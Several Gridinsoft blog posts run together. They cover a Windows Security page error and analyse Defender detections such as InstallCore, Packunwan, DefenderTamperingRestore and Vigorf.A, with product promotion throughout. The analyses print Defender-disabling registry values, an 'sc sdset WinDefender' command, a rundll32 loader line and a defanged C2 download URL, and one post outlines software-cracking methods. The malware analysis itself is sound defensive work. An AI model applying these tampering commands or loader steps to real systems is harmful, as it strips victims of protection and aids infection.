There are several reasons for this, and we will explore them further below. It is worth clarifying that it is normal for such a message to appear on a corporate device. But this is not all right if you see this on a personal computer. Today, I’ve gathered the most effective ways to fix this issue.

“Virus and Threat Protection Page Not Available” – What Does It Mean?

The message “Virus and Threat Protection Page Not Available” indicates trouble accessing Windows Security features. This means that, for some reason, the application cannot display the interface requested by the user. The virus and threat protection page comprehensively overviews your device’s security status. It displays relevant information about the antivirus software you are using, your device’s firewall status, and other enabled security features.

Windows Security is a built-in antivirus software developed by Microsoft. Initially, it was designed to protect against simple security threats like malware or viruses. However, now it’s an all-in-one tool that includes complex defense against phishing and other cyber attacks. It includes Virus and threat Protection, Account Protection, Firewall and network Protection, App and Browser Control, Device Security, Device Performance and health, and Family Options. Well, this doesn’t always work out properly, and now I will tell you why.

Why Is The Virus And Threat Protection Page Not Available?

Usually, to access Windows Security, you click on the Windows Security icon from the taskbar, or open the menu from the settings. If everything works correctly, you can access the menu with no problems. However, if Windows Security is unavailable, an error message will appear saying “Page not available”. Here are a few reasons for this to happen.

Specific OS edition.

Windows Enterprise or LTSC editions can have security features disabled by default. You can see the edition of your Windows copy by going to Settings → System → About, and checking the Windows specifications.

Normally, it is possible to change the security settings back to normal. I will show how to do this later in this post.

Improper OS settings after the reset

After resetting your OS, the virus and threat protection settings may not be configured correctly. Reasons for this are particularly hard to trace, but figuring that out is in fact just a waste of time. You can solve the issue in just a few clicks in this case.

Windows ISO obtained from unofficial sources

Obtaining a Windows image from questionable or pirated sources can result in missing or disabling essential security features. This is because the authors of such builds often try to make them as easy as possible by disabling “unnecessary” features. It is noteworthy that the antivirus function is often the first to be disabled.

Incompatibility with third-party antivirus

Sometimes, third-party antivirus tools may not be compatible with Windows Security. This is because two or more antimalware apps try to control or modify the same system resources simultaneously. This can lead to conflicts, malfunctions, or even complete functionality disabling.

Malware activity

Malware compromising system security settings could cause the “virus and threat protection page not available” notification. It can cause severe damage to your system, including data loss and theft. Since most average users only use the built-in Windows protection, any malware will obviously try to neutralize it first.

How to Fix the Virus and Threat Protection Page Not Available Error?

Despite having quite a few possible reasons to happen, Virus and Threat Protection Page Not Available error is rather easy to fix. All the troubleshooting boils down to understanding why it happened – I’ve named the reasons above. Now, let’s switch to actual troubleshooting.

1. Uninstall third-party security software

Today, most third-party antivirus solutions work well when paired with Microsoft Defender. However, some applications still require disabling the built-in Microsoft Defender to work correctly. If you have a third-party antivirus installed, try uninstalling it.

2. Update Your Windows

Cybersecurity threats evolve constantly, and software vulnerabilities can be exploited by malicious actors to gain unauthorized access or cause harm to your system. Windows updates can resolve existing security problems and ensure your computer runs optimally. It often includes patches and fixes for known security vulnerabilities.

Open Settings from Start and select Update & Security and click Check for updates under Windows Update.

This may take some time, especially if you’ve ignored the latest system updates for some time. Nonetheless, it is worth waiting, as the chances of this solving the issue are high.

3. Repair and Restart Windows Security

Despite Windows being a pretty stable operating system, sometimes uninstalling third-party software can corrupt the Windows Defender files. So, you can try resetting the Windows Security app, which may help run it back (for Windows 11 only).

First, click on the search icon or box on your taskbar. Then, search for “Windows Security.”

Here, select the Windows Security App and click the “App settings” option on the right panel.

Click on the “Terminate” button. After that, restart your computer to check if the error message is resolved.

If the issue persists, follow the same steps to access the Windows Security settings interface. Then, click on the “Reset” button to reset Windows Security.

Restart your computer again to ensure all the changes are applied successfully.

These were relatively simple ways of solving the problem that should have helped. However, if the issue of Virus and Threat Protection is unavailable persists, go on to more sophisticated solutions I’ve gathered below.

4. Run SFC and DISM

SFC and DISM are command-line tools that detect and repair system corruptions in Windows. If you can’t find Virus and threat protection on Windows 10/11 due to a system bug or corrupted image, use either tool to fix the issue. To repair your computer, follow these instructions:

Click on the Start menu and search for “Command Prompt”.

Right-click on “Command Prompt” and select “Run as administrator”.

To repair your system files using SFC, enter or paste the following into the Command Prompt window and press Enter: “sfc /scannow“.

To repair your system files using DISM, enter or paste the command into the Command Prompt window and press Enter: “DISM.exe /Online /Cleanup-image /Restorehealth“.

5. Disable UI Lockdown

Sometimes, the reason for Virus and Threat Protection Page Not Available issue is a disabled Windows Defender interface. This happens due to the activation of a so-called UI Lockdown. To fix this, run PowerShell as administrator and run the “Set-MpPreference -UILockdown 0” command. This will enable UI, fixing the Virus and Threat Protection Page Not Available issue.

6. Change the registry keys through Regedit

If the issue persists, you can manually add a few values using Regedit. To begin, open Regedit by pressing Win+R and typing “regedit” in the Run dialog box, then press Enter.

Once you are in Regedit, navigate to HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender. Right-click the empty area and select New → DWORD (32-bit) value.

Next, give the value a name: DisableAntispyware. Similarly, create another value with the name DisableRealtimeMonitoring. Leave the default value of 0 for both values.

Close the Registry Editor and restart your system. After restarting, check if Microsoft Defender is available with its apps.

7. Using Local Group Policy

One more option is adjusting the Local Group Policy, responsible for Microsoft Defender. This may be the result of a malware activity, as well as the effect of an antivirus software conflicting with the Defender. Fixing this requires entering the Group Policies menu.

Press the Windows key + R to open the Run dialog box and type or paste this: gpedit.msc. Go to Computer Configuration → Administrative Templates → Windows Components.

Open Windows Security and navigate to the Virus and Threat Protection option.

Double-click the Hide the virus and threat protection area and select Not Configured.

Restart your PC to apply the new settings and try running the feature.

Install Compatible Anti-malware

As I said at the beginning, this could result from malware activity. Most malware targets the built-in Windows defenses, which explains a lot. In such cases, I recommend using a third-party solution. However, it is equally important that the third-party solution works well with the built-in solution.

That’s why I recommend GridinSoft Anti-Malware. It works perfectly with Microsoft Defender and does not burden the system. After installation, run a full scan, which will completely clean the system.

The post Virus and Threat Protection Page Not Available appeared first on Gridinsoft Blog.

Win32/InstallCore may not look like a serious threat, but the effects of its activity are not pleasant either. Unwanted programs, adware, junk apps – this PUA is not picky about things it spreads. It is a serious threat to users that requires attention and removal.

Protect your computer against unwanted software! GridinSoft Anti-Malware will detect the most dodgy and tricky of them before they can mischief you. Get yourself reliable protection

What is PUADlmanager Win32/InstallCore?

PUADlmanager Win32/InstallCore is the name for the detection of a program that packages additional software with the main one. It is not a stand-alone program, but rather an application on top of the program installer. Once you launch such infused installer, InstallCore is up, too, ready to perform its dirty deeds.

The prefix “PUADlmanager” (PUA Downloading Manager) says clearly about this property. The thing InstallCore tries to accomplish is downloading and installing things in the background, without user’s permission. This way, ones who spread the program try to monetize their effort. Typically, those apps are unwanted programs of some sort and adware.

Things like Win32/InstallCore are often spread embedded into pirated software. Some of the freeware program may contain this, too, particularly ones from platforms like Softonic, Download.com and FileHippo.

Is InstallCore a False Positive?

As far as I recon, false positives of PUADlmanager Win32/InstallCore can occur in several cases. One of the users on the Information Security Stack Exchange forum noted that it can be related to security signature updates or in case of installing third-party software. This is not always a threat, but rather belongs to the “gray” category, as it is not as dangerous as malware.

Another example of a false positive was discussed on the JDownloader Community forum, where Microsoft Defender mistakenly detected malware in the JDownloader.exe file. In this case, the JDownloader developers reported the false positive and asked users to report it as well, confirming that JDownloader does not contain malware. There was also a discussion on the Microsoft forum about a false positive on the Five Nights at Freddy’s game installer.

Antivirus programs regularly update their malware signature databases. Sometimes, new signatures can mistakenly classify safe files or programs as malicious. However, users may not pay attention to additional programs that are offered for installation along with the main software. If such additional software falls into the PUA/PUP category, Microsoft Defender will detect it as such.

How does PUADlmanager Win32/InstallCore affect my computer?

As I wrote above, the danger of PUADlmanager is that it downloads and installs numerous unwanted programs without users’ concent and knowledge. Most of them may have unpredictable consequences for the computer and user data. To test the thing, I’ve found several examples of apps that Microsoft Defender detected as Win32/InstallCore.

In one instance, the app had no real functionality, being just a shell with an attractive interface. It was advertised as software to help download files, particularly from torrents, but didn’t really provide any real features. This became clear when I discovered that despite promises of advanced features for an additional fee, the program actually provided no utility and could perform suspicious activities on my PC.

However, uselessness is not the only issue here. As soon as I pressed the “Install” button, numerous other programs started to appear. Driver updaters, “free” VPNs, system tuners – plenty of them. Their sheer volume made the virtual machine I was running the test on exceptionally slow.

One more thing that was definitely an effect of InstallCore activity is advertisements flooding the websites. It looks like aside from the unwanted programs, this PUA also brought an adware of some sort. Irrelevant advertisements both in the browser and system tray kept popping up until the malware removal.

On top of that, the browser started opening the pages which demand installing some questionable browser plugins. Among other things, I’ve noticed a well-known plugin, called Dragon Angel. This thing works as a browser hijacker, and is usually promoted in this exact way. Though, it may be a lesser evil here, as browser plugins can also work as infostealers and crypto hijackers.

Overall, PUADlmanager Win32/InstallCore is not a severe threat by any measures. But the effects of its activity are nowhere near pleasant, too: they make the system hard to use, distract you with ads, and potentially compromise the computer for further infections. This should be removed as soon as possible.

How to remove PUADlmanager Win32/InstallCore from PC?

To prevent PUADlmanager Win32/InstallCore, it is recommended to use a reliable antivirus software capable of detecting and removing all malware components. GridinSoft Anti-Malware offers an effective solution to detect and eliminate this kind of threats, providing comprehensive system protection.

Manual removal of InstallCore and related unwanted programs is possible, but it requires some knowledge and can be a time-consuming process. To prevent infection, it is important to avoid downloading programs from unverified sources, do not open suspicious email attachments.

The post PUADlmanager Win32/InstallCore appeared first on Gridinsoft Blog.

The most popular sources of such hacking tools are torrent distributions and websites with hacked software. Let me explain, what hacked software is, what risks its use entails, and whether it is profitable to use it compared to licensed software.

What is HackTool:Win32/Crack

HackTool:Win32/Crack is a generic detection that Microsoft Defender attributes to a piece of code that bypasses the license check. It is worth clarifying that it rarely refers to a stand-alone program but to a modified element of a benign app. Win32/Crack means a change in the program files or a part of it aimed at disabling the license verification mechanism.

Win32/Crack is often distributed via torrents or websites dedicated to cracked software that has its licensing system tweaked or disabled. It can be either a separate file or embedded into the executable file of the target program. By its nature, HackTool:Win32/Crack does not pose a direct threat to the system, even though the thing it does is illegal. The Defender’s detection of such tools is compulsory to fight piracy.

Is Hacktool:Win32/Crack Dangerous?

Although Win32/Crack is not dangerous, a lot of them come with other malware embedded in the same executable file. Particularly greedy authors of such software do this to monetize their effort. Such “bonuses” can include infostealers and more severe malware like ransomware. As a result, instead of saving money, the user pays a higher price, in the form of stolen confidential data or encrypted files.

How does Win32/Crack Work?

There are two different types of software cracking: by making the program believe it has a proper activation and by disabling this check completely. Both have pros and cons, and both are illegal to perform and use. Let’s have a closer look at how this works.

The methods of software cracking below are listed exclusively for educational purposes. I discourage using unlicensed software, due to both legal dangers and malware hazards. These hacking approaches are here to make a clear understanding of what exactly Microsoft Defender means as Win32/Crack.

Disabling the license check

One way to protect software from unauthorized use is by including a check license function in its startup procedures. Essentially, the software program is a set of instructions, represented as a series of bytes, executed by the CPU. During reverse engineering, the checkLicense section is identified and decompiled. A programmer may patch the binary by replacing specific bytes to bypass the check license requirement.

The patched bytes typically satisfy the check license requirement by writing values into registers or memory addresses or returning a particular status code. After patching the binary, the handyman manipulates the check license function, and the software program is considered “cracked.” However, with most apps now checking keys on their servers, this method is becoming less common.

Embedding the key

Such a crack approach emulates an online key verification process and results positively without a real internet connection. Often, in the instructions for using the app, one of the points is “deny the application access to the Internet”. This is because the license will be deactivated once the app connects to the server and uncovers that it is fake. These days, most cracks are not dependent on the connection and allow you to enter any text instead of the key.

This is how a spoofed product activation looks like (screenshot is not ours!)

This is how a spoofed product activation looks like (screenshot is not ours!)

This is how a spoofed product activation looks like (screenshot is not ours!)

In the real world, things are more complicated now, as the software will “phone home” and see if those keys are any good. This can be bypassed by sniffing/decrypting HTTPS traffic and finding the Web request that asks if the key is valid. From there, it can be intercepted, thus never letting the request reach its final destination and replying with your own (fake) response.

Handyman can make this or log and copy an already valid response. The program will believe it got the go-ahead from the server and continue operating as normal. In that case, you can/need to modify the binary so that it always thinks the answer from the server is positive. Another trick of this grade is to run a fake HTTP server that always replies positively and redirects the check.

Is it a False Positive?

In most cases, HackTool:Win32/Crack is not a false positive, with just a few exceptions. As I said at the beginning, it detects specific changes done to the program file. Microsoft Defender can mistakenly detect HackTool:Win32/Crack if there are changes in the program’s code that could be interpreted as signs of a crack. For instance, if a program uses code strings, jumpers or calls typical for Win32/Crack, the antivirus might incorrectly classify it as one. In such cases, I recommend you check the file using our free online checker.

Safety Recommendations

I’d emphasize once again – do not use pirated software at all for your safety. In addition to being illegal, pirated software is a breeding ground for malware. Once a user adds any malware or potentially unwanted software to the antivirus exceptions, it can take on a life of its own. Therefore, if you see HackTool:Win32/Crack detection, download GridinSoft Anti-Malware and perform a full scan of your device.

The post HackTool:Win32/Crack appeared first on Gridinsoft Blog.

Usually, these unwanted programs are distributed as “recommended software” in freeware, shareware or cracked installers. The name “Packunwan” stands for the unwanted program that uses packing, which makes the analysis more complicated. Programs detected with this name are almost always some no-name tools or duplicates of other programs.

Protect your computer against unwanted software! GridinSoft Anti-Malware will detect the most dodgy and tricky of them before they can mischief you. Get yourself reliable protection

PUA:Win32/Packunwan Overview

The PUA:Win32/Packunwan is a potentially unwanted application (PUA) detection. However, the analysis of samples collected on the Web revealed much more malicious functionality. Due to the diverse nature of reports, it is challenging to ascertain their precise behavior without in-depth analysis. At the same time, this unwanted program was not attributed to any known developer or company, leading to speculation that these programs may be of dubious origin.

While PUAs are not necessarily viruses, they can still be disruptive and pose security risks. Packunwan typically displays unwanted advertisements on your computer. It can also track your browsing activity and change your browser settings. Among the most noticeable is the change to your homepage or search engine.

On the other hand, the behavior of this program is in fact far beyond “showing unwanted ads”. Reviewing the sample shows that it collects way too much system information, which in combination with packing and detection evasion makes it look fishy. The overall activity of Packunwan can lead to compromised privacy and malware injection.

Packunwan Technical Analysis

As I’ve just said, while analyzing Packunwan malware samples, I’ve seen a lot of questionable actions. In particular, it collects way too much info about the system. Not enough to call it a spyware, but still more than I would consider acceptable. Also, its networking is outright strange, bordering with what you would expect from dropper malware. Even though not all samples were like this, there was a consistent behavior pattern.

Launch & System Discovery

Upon execution, the reviewed Packunwan sample checks the computer’s location settings for no obvious reason. This is the standard behavior for a malware, but not a “driver updater”. To do this, it queries the registry for specific values related to country code configurations.

After that, the program starts gathering system information. By checking the selection of registry entries and system functions querying, it retrieves the list of installed software, OS information and system drivers. The latter is needed for the functionality of the “driver updater”, but can also be useful to discover whether the system is a virtual machine.

One anti-analysis trick that I am sure about is checking the disk info through the registry query. The malware checks SCSI registry keys, which uncover whether it is a virtual disk space created by a sandbox environment or a virtual machine. SCSI technology is not supported these days, and it is unlikely for a geek who tries to play with geriatric hardware to use questionable apps.

HKLM\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001
HKLM\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000

Persistence and Detection Evasion

PUA:Win32/Packunwan uses various obfuscation techniques to dodge the detection. As its name implies, its files are packed, i.e. compressed and encryted. The sample I reviewed encrypted data using RC4 PRGA. Additionally, it attempts to conceal itself by creating files in user directories with extensions that do not match the file type. It at the same time disguises the payload as a part of the “driver updater” files.

For persistence, the program creates Windows services and adds entries to Registry Run keys/startup folders. While being a rather widespread step, it remains effective, especially in poorly-protected systems. Packunwan also does not allow you to opt out the startup from the interface – a common practice among unwanted programs.

Network Communications

I’ve mentioned that Packunwan is usually distinctive for its networking activity. Though, not every sample had that much of strange things happening in the background as the one I had a deeper look on. Throughout a short period of time, it performs consequent access to the remote server. You can see the example of one of these messages below:

Sure enough, driver updaters should get the drivers they are about to install somewhere. But as far as I’m aware, not even a single program creates that much chaos in networking logs. It is either a poor software design, or the attempt to conceal something by blending it into this mess.

How To Remove PUA:Win32/Packunwan

You will need an antimalware tool to remove PUA:Win32/Packunwan. I recommend GridinSoft Anti-Malware – it will be the optimal solution in such a case. You should run a full scan, whether it is an adware PUA or a dropper. It might take a little longer, but it will guarantee a more effective cleaning.

The post PUA:Win32/Packunwan appeared first on Gridinsoft Blog.

As history shows software developers like Rostpay have already made a name for themselves in the digital marketplace as builders of unwanted software. But due to the pursuit of free software, users are taking risks that expose the security of their systems and devices.

Protect your computer against unwanted software! GridinSoft Anti-Malware will defend your system any time, in any circumstances, by your mere command. Get yourself reliable protection

What is PUABundler:Win32/Rostpay?

PUABundler:Win32/Rostpay is the name for a potentially unwanted program detected by Microsoft Defender. This is complex software that is usually distributed bundled with other applications, often without the user’s explicit consent. Such programs may include various components such as adware, browser toolbars, pseudo-system optimizers, and else.

As I wrote above, Rostpay developers bundle their free programs with unknown and almost always uncoordinated software. On the Web, a lot of users complain that numerous unwanted programs are installed in parallel with the installation of programs developed by this company.

Another part complains about the troubles these programs create. In other words, Rostpay’s software is not particularly effective, creating just a pale resemblance of real work. Its removal can also be complicated and require additional software. This results into considering such software an unwanted program.

PUABundler:Win32/Rostpay Analysis

Samples for analysis were not difficult to find – you just need to download programs from the developer Rostpay. I opted for Tesla Browser and Driver Hub for the analysis, downloaded and installed them.

Win32/Rostpay #1 – Driver Hub

Driver Hub is a software solution ostensibly designed to check and update outdated drivers on your system. But there are pitfalls here that spoil the overall picture. When we open the setup file, we see the next message:

As I’ve mentioned above, PUABundler:Win32/Rostpay usually comes with bundled software, and this checks out in my test with Driver Hub. Instead of Yahoo, the offered programs may differ depending on the product you install and your location.

What did not happen to me, but was an often point of user complaints after Rostpay activity is various system troubles. People particularly tell about Internet connectivity issues, keyboard input problems, and similar bugs. Most probably, they are the outcome of the installation of a faulty driver – at least, these symptoms sound like driver issues.

That is actually one major problem with any “driver updater” software – they barely have the most recent and correctly working drivers for all hardware. All attempts to create such a thing fail for one reason – it is too much of a hardware out there. And Driver Hub is no exception.

Win32/Rostpay #2 – Tesla Browser

Tesla Browser is yet another thing detected as PUABundler:Win32/Rostpay. According to the advertising promises, it is a web browser that offers an improved surfing experience on the Internet. However, not everything is as rosy as it seems at first glance. The first questionable thing pops up during the installation: the offer to install an unrelated program.

Though, Tesla Browser itself can come in the very same bundle, hidden as a “recommended software”. Such unwanted programs spread quite literally through budding: one contains 2 others, and each of them in turn install another two. So yes, one unwanted program can make a mess that will be hard to ignore.

The biggest problem with the Tesla Browser is that it can act as adware or a browser hijacker. Forget about what they promise on the website – no “advanced security features” or “regular updates”. This browser can redirect your queries to a random search engine, and display modified search results, filled with promotions. And even when you do not use it, the pop-ups with offers to install plug-ins or other stuff will keep popping up in other browsers.

Removing Win32/Rostpay and other PUAs from PC

I recommend GridinSoft Anti-Malware, which will easily remove all remnants of Win32/Rostpay and all the garbage installed with it. And in general, the program will provide a decent real-time protection of your system.

Uninstalling Win32/Rostpay as well as other software that was installed together without your permission is possible in manual mode. However, there is a risk that you will not be able to clean all the elements that unwanted programs leave in the system. Their sheer volume can also make the removal process a rather time-consuming endeavour. High-quality antivirus software will facilitate this process and save you time.

The post PUABundler:Win32/Rostpay appeared first on Gridinsoft Blog.

Threats like VirTool are often the sign of an ongoing malware attack. Threats may carry embedded code that targets security tools, as well as use a stand-alone script. The fact that malicious software tries to disable antivirus tools usually means that its activities are hard to conceal, i.e. it is something harsh and severe. Ransomware, desktop blockers, vandal viruses, coin miners – all of them can make use of a defenceless system.

Protect your computer with a persistent, threat-resistant antimalware tool! GridinSoft Anti-Malware will defend your system any time, in any circumstances, by your mere command. Get yourself reliable protection

What is VirTool:Win32/DefenderTamperingRestore?

VirTool:Win32/DefenderTamperingRestore detection points at a malignant element that can prevent Microsoft Defender from working properly. This can include various scripts, ones that modify registry keys that control the functioning of Defender. It is also triggered when you are trying to run scripts or download programs designed to subvert system defenses. As I said, VirTool is hidden from the user and runs in the background. This makes malware detection and removal more difficult.

Also, pirated software can contain part of code that modifies system settings to bypass license restrictions but does not carry malicious functionality. Pirated software may also include scripts that disable Microsoft Defender to prevent malicious components from being detected and removed.

Is VirTool:Win32/DefenderTamperingRestore false positive?

Although VirTool:Win32/DefenderTamperingRestore usually indicates the presence of malicious activity, in some cases it may be the result of a false positive detection. This can happen if legitimate software or administrative scripts change security settings during standard operation or system maintenance.

VirTool:Win32/DefenderTamperingRestore sometimes also appears in scenarios involving the use of Microsoft Safety Scanner (MSERT), which can identify and report changed settings as part of its scan, correcting them back to safer configurations.

DefenderTamperingRestore Analysis

As I said above, it specializes in modifying registry keys to disable Microsoft Defender, or restrict its capabilities. This is mainly done through PowerShell or Command Prompt commands that modify system policies and specific Defender settings.

One particular thing that quite a few VirTool:Win32/DefenderTamperingRestore samples do is modify the registry entries responsible for real-time and heuristic protection. Malware particularly goes for the “DisableRealtimeMonitoring” key to disable real-time protection or modify “DisableBehaviorMonitoring” to stop tracking suspicious activity.

Walking Through Affected Registry Keys

Among the main targets of VirTool is to disable Defender completely. Malware creates the “DisableAntiSpyware” parameter, setting its value to 1, which stops Defender from running.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

To disable proactive protection, VirTool creates another key – “DisableRealtimeMonitoring” – and sets it to 1. This stops the security tools from continuous scanning of all the accessed folders and launched files.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

A less often trick that thing pulls targets the automatic sample submission system. By setting the 1 value to the DontReportInfectionInformation entry in the following registry hive, it disables sending samples to Microsoft.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet

Some of the things that Microsoft detects with this name reach a sky-high level of tricks with Windows commands. A confusing set of meaningless letters and symbols you can see below is in fact rather useful. It sets certain folders – particularly ones that malware uses – to the whitelist of Microsoft Defender. Several ransomware samples use same or similar commands during gaining persistence.

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

In rare cases, VirTool acted as a loader, downloading and executing additional malicious modules. It modified “Shell” and “Userinit” registry keys to execute malicious scripts at system startup. Though a much more common occasion is this malicious element being embedded into a more complex script. The latter typically orchestrates the initial malware injection, where disabling Microsoft Defender is a rather obvious preliminary step.

How to Remove VirTool:Win32/DefenderTamperingRestore?

The appearance of VirTool:Win32/DefenderTamperingRestore is usually a bad omen. It is likely a sign of malware activity that goes below the radar. For that case, I recommend following these steps:

1. Restart your computer into Safe Mode with Networking

Open Start menu, then click the “Reboot” button while holding the Shift key. The Troubleshooting menu will appear, select here “Troubleshoot” → “Startup Settings” and click “Restart”. This sends you to the window with Safe Mode options.

Scroll to see steps 2, 3 and 4

There, click on the 5 button to launch the Safe Mode with Networking. This mode stops all non-essential processes from launching, leaving you with bare Windows and network connectivity features enabled. By doing so, you restrict malware from running, making the removal much easier to accomplish.

2. Run reliable antivirus software

Download a reliable antivirus software that can remove VirTool remnants permanently from your PC. GridinSoft Anti-Malware is an excellent option for this. Run a Full Scan and remove any detected threats.

The post VirTool:Win32/DefenderTamperingRestore appeared first on Gridinsoft Blog.

PUA:Win32/Vigua.A Overview

PUA:Win32/Vigua.A is a generic detection associated with unwanted software positioned as a system optimizer. Usually, it falls under scareware definition – an app that finds many issues in the system and requires purchasing the full software version to fix them. Alternatively, such apps offer to fine-tune the system “to get better performance”, asking for a pay for useless or dangerous functionality.

Despite the beautiful interface and convincing messages, the effectiveness of such software is very questionable. The fact is that often, all these “issues” or “improvements” do not exist, and all this is done to force the user to buy the full version of the program. Moreover, such applications can sometimes harm the system or even lead to BSoD. However, this is not the only harm that Vigua can cause.

I’ve performed my own analysis of several samples of unwanted programs that Microsoft detects as Vigua.A. The findings are, well, disturbing, but not particularly new. Let’s get into things one by one.

Vigua.A Analysis

The unwanted software that falls under this detection name is rather similar, so all the characteristics below are more or less applicable to the majority of Vigua.A samples out there. Moreover, a couple of samples I’ve picked up for this analysis are related to no-name tools, meaning that they barely have any online footprint.

Spreading

Although some PUAs have their “official websites”, users almost always get them unwillingly. Vigua.A often comes as “recommended software” with freeware or pirated programs, in a form of software bundle. This is already enough to call it unwanted software, as security vendors considered this distribution method dangerous long ago. Yet moving on uncovers even more interesting details.

Fake Issues and System Tuning

As I said above, PUA:Win32/Vigua.A just mimics the operation, without any real action. Before making changes to the system, legit system optimizers usually let you see each action and decide whether to perform it or not. Vigua shows only the number of errors found without details and offers to fix them in one click. It is impossible to find out what is going on “under the bonnet” of the program, as the source code is closed, and the entire course of action is unclear.

Another type of PUAs that fall under this detection name is pseudo system optimizers. They promise to “improve” the user experience by removing alleged bloatware and disabling the non-needed functionality. The issue is that both samples of this category that I’ve tested did not say what exactly they change, same as the scareware from above.

And here is the main issue: when the program disables whatever it thinks is unnecessary, chances are – it will disable a thing you actually need. This will eventually lead to a selection of really unpleasant circumstances, both for your user experience and overall system stability. Once again – quite a few Vigua.A samples are not even publicly available; they are no-name software with no one responsible for possible issues.

Browser Data Collection & Exfiltration

Now, let’s discuss a part about PUA:Win32/Vigua.A that worries me more than futile functionality or no control over the changes. According to the analysis, PUA:Win32/Vigua.A collects information about the user’s network activity. This information includes browser activity, history, requests, etc. On top of that, unwanted programs collected basic system info, probably to fingerprint the system.

List of data collected by Vigua.A

Such information is still not comparable to what information stealing malware will collect. Nonetheless, sharing information with untrustworthy software vendors is 100% a bad option. It is hard to predict how they will use this data, but most probably, it would be sold to the advertising network. Sure, these networks collect info about us anyway, though at least we consent for this – which is barely the case when it happens to Vigua.

Is PUA:Win32/Vigua.A False Positive?

In some cases PUA:Win32/Vigua.A can be a false positive. This is due to programs’ behavior, particularly their ability to change low-level system settings. For example, Microsoft Defender can falsely detect legitimate miners such as NiceHash. Another category of software that sometimes receives this detection as false positive is torrent clients. Two particular of the latter are qBitTorrent and Transmission – both open-source and totally safe.

Overall, programs that can manage hardware settings or call to one directly and do not have proper certificates can easily get the Vigua detection. If you’ve got something that fits this description, don’t haste with deleting it. Perform a double check using our free Online Virus Scanner tool: it will give you a much needed second opinion for this case.

How to Remove PUA:Win32/Vigua.A?

To remove unwanted software like PUA:Win32/Vigua.A, I’d recommend using GridinSoft Anti-Malware. Although seeing the Vigua detection is not a sign of a severe malware running, I would not hesitate with removing it. As it often gets to the system in a software bundle, there is a chance of numerous other unwanted software present on your computer. Run a Standard scan, and let it finish – this will repel any questionable element in the system.

The post PUA:Win32/Vigua.A appeared first on Gridinsoft Blog.

What is Trojan:Win32/Vigorf.A?

Trojan:Win32/Vigorf.A is the detection name that Microsoft Defender attributes to dropper/loader malware. This generic detection name refers to a whole range of malicious programs, rather than one specific family. The goal of Vigorf.A is unauthorizing system access, and further malware distribution. As my detailed analysis has shown, Trojan:Win32/Vigorf.A uses various methods to bypass antivirus programs and operating system protection.

Usually, this malware downloads or installs other malicious programs on the computer. It drops its files and modifies system settings and other configuration files to gain persistence. Additionally, it connects to remote servers to send collected information and download additional malicious programs.

Is Trojan:Win32/Vigorf.A False Positive?

False positives with the Vigorf.A name is not a common occurrence. There are only a few cases discussed online, and all of them are related to the software that borders on malicious.

The most common case here is game modifiers or patches. Such tools modify game memory or files to unlock features and can be misidentified as Trojan:Win32/Vigorf.A because of their ability to intrude into other programs’ memory. Similar tools and scripts used by software developers can be misidentified as malicious. While being potentially safe and legitimate, it is important to treat such software with care.

Vigorf.A Trojan Analysis

Studying the behavior of Trojan:Win32/Vigorf.A sample on an infected system showed me how elaborate these threats can be. Not only does the Trojan collect personal user data, but it also modifies system settings, creating additional vulnerabilities and opening the door for other malware.

Methods of Distribution

Trojan:Win32/Vigorf.A is often spread via spam e-mail campaigns containing malicious attachments or links. Once the user opens the attachment or clicks on the link, the Trojan is installed on their computer, either directly or through the loading script. Despite being used for malware spreading for years now, email spam remains a particularly potent and effective spreading option.

Malvertising is another tricky method that has been used to spread Trojan:Win32/Vigorf.A as far as my research goes. This malware exploits ad networks to display malicious ads in search engine results. Such ads redirect users to malicious duplicates of familiar sites or directly download malware onto their devices.

In addition, Vigorf.A is often hidden in packages containing illegal or pirated software. When I download and install such programs, the trojan is also installed on my computer. Often such software is offering for free, which makes it attractive, but it ends up costing more because of the damage the trojan causes.

Launch, Gaining Persistence and Data Collection

After launching in the system, Trojan:Win32/Vigorf.A adds itself to autorun by taking advantage of the Startup folder. This allows it to start automatically every time the system starts. In my case, I found a strange shortcut adxjcv4.lnk, which turned out to be associated with the trojan.

APPDATA%\microsoft\windows\start menu\programs\startup\_adxjcv4_.lnk

Alternatively, Vigorf.A may use the DLL hijacking technique. This happens particularly often when malware arrives with the loader, which unpacks the sample and handles the launch. The way to run the malware is nothing unusual – a PowerShell command that runs the malware DLL through the call to rundll32.exe.

rundll32.exe %windir%\system32\advpack.dll

After the launch, malware checks the system location by its IP address and switches to collecting the system data. This gives Vigorf.A the ability to distinguish that particular system from others. This can as well be used for more targeted attacks or to get a rather exhausting set of victims’ system info to analyze. Malware particularly checks the values of the following keys to get info about programs present on the PC:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA} and \=\Count

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F} and \=\Count

By checking the next keys, Trojan:Win32/Vigorf.A learns about the devices and networks to which the computer connects and can identify the most vulnerable points for further attacks. This information helps malware masters to deploy malware in a more relevant manner, and get extra profit from systems related to a network.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache and \=\Intranet

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect

C2 Communications and Malware Delivery

After collecting all this data, Vigorf encrypts and sends it to the command server using HTTP POST request. The list of command servers was predefined for the samples I’ve worked with, but this may differ in other cases. Server, in turn, responds with a blob of data that instructs malware for further actions. Obviously for dropper malware, payload delivery is one of the most probable instructions it can get.

To instruct the dropper for malware delivery, C2 sends the URLs Vigorf should connect and download it from. It sends HTTP GET commands to the following URLs:

http[:]//185.117.75.198/fiscal/1
